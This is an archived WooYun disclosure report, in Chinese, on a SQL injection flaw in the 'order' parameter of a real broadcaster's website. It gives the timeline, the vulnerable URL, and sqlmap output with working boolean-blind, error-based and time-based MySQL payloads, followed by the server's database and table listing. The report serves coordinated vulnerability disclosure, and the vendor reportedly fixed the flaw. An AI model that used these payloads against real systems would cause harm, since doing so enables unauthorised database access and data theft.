乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-20: 细节已通知厂商并且等待厂商处理中 2015-08-21: 厂商已经确认,细节仅向厂商公开 2015-08-31: 细节向核心白帽子及相关领域专家公开 2015-09-10: 细节向普通白帽子公开 2015-09-20: 细节向实习白帽子公开 2015-10-05: 细节向公众公开
RT
http://www.hktv.tv/e/extend/say/p_index.php?classid=88&id=347&num=5&order=1&sub=60参数 order
Parameter: order (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: classid=88&id=347&num=5&order=1 RLIKE (SELECT (CASE WHEN (5751=5751) THEN 1 ELSE 0x28 END))&sub=60 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: classid=88&id=347&num=5&order=1 AND (SELECT 2695 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(2695=2695,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sub=60 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: classid=88&id=347&num=5&order=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FfrU)&sub=60---web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0current user: '[email protected]:52156'current user is DBA: Falseavailable databases [24]:[*] bbs_hktv[*] cdp[*] cms_as[*] cms_hktv[*] information_schema[*] jsbc-security[*] meicam[*] mysql[*] odp[*] onairfastedit[*] onairtranscode[*] ors[*] performance_schema[*] security_as[*] security_hktv[*] security_hn[*] vms[*] vms_as[*] vms_hktv[*] vms_jyg[*] vms_sjs[*] wechat_hn[*] wechat_sjs[*] yicloud_aliyun_rds_dummy_databaseDatabase: cms_hktv[238 tables]+------------------------------+| hks_ecms_article || hks_ecms_article_check || hks_ecms_article_check_data || hks_ecms_article_data_1 || hks_ecms_article_doc || hks_ecms_article_doc_data || hks_ecms_article_doc_index || hks_ecms_article_index || hks_ecms_download || hks_ecms_download_check || hks_ecms_download_check_data || hks_ecms_download_data_1 || hks_ecms_download_doc || hks_ecms_download_doc_data || hks_ecms_download_doc_index || hks_ecms_download_index || hks_ecms_flash || hks_ecms_flash_check || hks_ecms_flash_check_data || hks_ecms_flash_data_1 || hks_ecms_flash_doc || hks_ecms_flash_doc_data || hks_ecms_flash_doc_index || hks_ecms_flash_index || hks_ecms_info || hks_ecms_info_check || hks_ecms_info_check_data || hks_ecms_info_data_1 || hks_ecms_info_doc || hks_ecms_info_doc_data || hks_ecms_info_doc_index || hks_ecms_info_index || hks_ecms_infoclass_article || hks_ecms_infoclass_download || hks_ecms_infoclass_flash || hks_ecms_infoclass_info || hks_ecms_infoclass_movie || hks_ecms_infoclass_news || hks_ecms_infoclass_photo || hks_ecms_infoclass_shop || hks_ecms_infotmp_article || hks_ecms_infotmp_download || hks_ecms_infotmp_flash || hks_ecms_infotmp_info || hks_ecms_infotmp_movie || hks_ecms_infotmp_news || hks_ecms_infotmp_photo || hks_ecms_infotmp_shop || hks_ecms_movie || hks_ecms_movie_check || hks_ecms_movie_check_data || hks_ecms_movie_data_1 || hks_ecms_movie_doc || hks_ecms_movie_doc_data || hks_ecms_movie_doc_index || hks_ecms_movie_index || hks_ecms_news || hks_ecms_news_check || hks_ecms_news_check_data || hks_ecms_news_data_1 || hks_ecms_news_doc || hks_ecms_news_doc_data || hks_ecms_news_doc_index || hks_ecms_news_index || hks_ecms_photo || hks_ecms_photo_check || hks_ecms_photo_check_data || hks_ecms_photo_data_1 || hks_ecms_photo_doc || hks_ecms_photo_doc_data || hks_ecms_photo_doc_index || hks_ecms_photo_index || hks_ecms_shop || hks_ecms_shop_check || hks_ecms_shop_check_data || hks_ecms_shop_data_1 || hks_ecms_shop_doc || hks_ecms_shop_doc_data || hks_ecms_shop_doc_index || hks_ecms_shop_index || hks_enewsad || hks_enewsadclass || hks_enewsadminstyle || hks_enewsbefrom || hks_enewsbq || hks_enewsbqclass || hks_enewsbqtemp || hks_enewsbqtempclass || hks_enewsbuybak || hks_enewsbuygroup || hks_enewscard || hks_enewsclass || hks_enewsclass_stats || hks_enewsclass_stats_ip || hks_enewsclass_stats_set || hks_enewsclassadd || hks_enewsclassf || hks_enewsclassnavcache || hks_enewsclasstemp || hks_enewsclasstempclass || hks_enewsdiggips || hks_enewsdo || hks_enewsdolog || hks_enewsdownerror || hks_enewsdownrecord || hks_enewsdownurlqz || hks_enewserrorclass || hks_enewsf || hks_enewsfava || hks_enewsfavaclass || hks_enewsfeedback || hks_enewsfeedbackclass || hks_enewsfeedbackf || hks_enewsfile_1 || hks_enewsfile_member || hks_enewsfile_other || hks_enewsfile_public || hks_enewsgbook || hks_enewsgbookclass || hks_enewsgfenip || hks_enewsgroup || hks_enewshmsg || hks_enewshnotice || hks_enewshy || hks_enewshyclass || hks_enewsindexpage || hks_enewsinfoclass || hks_enewsinfotype || hks_enewsinfovote || hks_enewsjstemp || hks_enewsjstempclass || hks_enewskey || hks_enewskeyclass || hks_enewslink || hks_enewslinkclass || hks_enewslinktmp || hks_enewslisttemp || hks_enewslisttempclass || hks_enewslog || hks_enewsloginfail || hks_enewsmember || hks_enewsmember_connect || hks_enewsmember_connect_app || hks_enewsmemberadd || hks_enewsmemberf || hks_enewsmemberfeedback || hks_enewsmemberform || hks_enewsmembergbook || hks_enewsmembergroup || hks_enewsmemberpub || hks_enewsmenu || hks_enewsmenuclass || hks_enewsmod || hks_enewsnewstemp || hks_enewsnewstempclass || hks_enewsnotcj || hks_enewsnotice || hks_enewspage || hks_enewspageclass || hks_enewspagetemp || hks_enewspayapi || hks_enewspayrecord || hks_enewspic || hks_enewspicclass || hks_enewspl_1 || hks_enewspl_set || hks_enewsplayer || hks_enewsplf || hks_enewspltemp || hks_enewspostdata || hks_enewspostserver || hks_enewsprinttemp || hks_enewspublic || hks_enewspublic_update || hks_enewspubtemp || hks_enewspubvar || hks_enewspubvarclass || hks_enewsqmsg || hks_enewssearch || hks_enewssearchall || hks_enewssearchall_load || hks_enewssearchtemp || hks_enewssearchtempclass || hks_enewsshop_address || hks_enewsshop_ddlog || hks_enewsshop_precode || hks_enewsshop_set || hks_enewsshopdd || hks_enewsshopdd_add || hks_enewsshoppayfs || hks_enewsshopps || hks_enewssp || hks_enewssp_1 || hks_enewssp_2 || hks_enewssp_3 || hks_enewssp_3_bak || hks_enewsspacestyle || hks_enewsspclass || hks_enewssql || hks_enewstable || hks_enewstags || hks_enewstagsclass || hks_enewstagsdata || hks_enewstask || hks_enewstempbak || hks_enewstempdt || hks_enewstempgroup || hks_enewstempvar || hks_enewstempvarclass || hks_enewstogzts || hks_enewsuser || hks_enewsuseradd || hks_enewsuserclass || hks_enewsuserjs || hks_enewsuserjsclass || hks_enewsuserlist || hks_enewsuserlistclass || hks_enewsuserloginck || hks_enewsvote || hks_enewsvotemod || hks_enewsvotetemp || hks_enewswapstyle || hks_enewswfinfo || hks_enewswfinfolog || hks_enewswords || hks_enewsworkflow || hks_enewsworkflowitem || hks_enewswriter || hks_enewsyh || hks_enewszt || hks_enewsztadd || hks_enewsztclass || hks_enewsztf || hks_enewsztinfo || hks_enewszttype || hks_enewszttypeadd || hks_tv || hks_tv_playlist |+------------------------------+
~
危害等级:中
漏洞Rank:10
确认时间:2015-08-21 10:14
已修改
暂无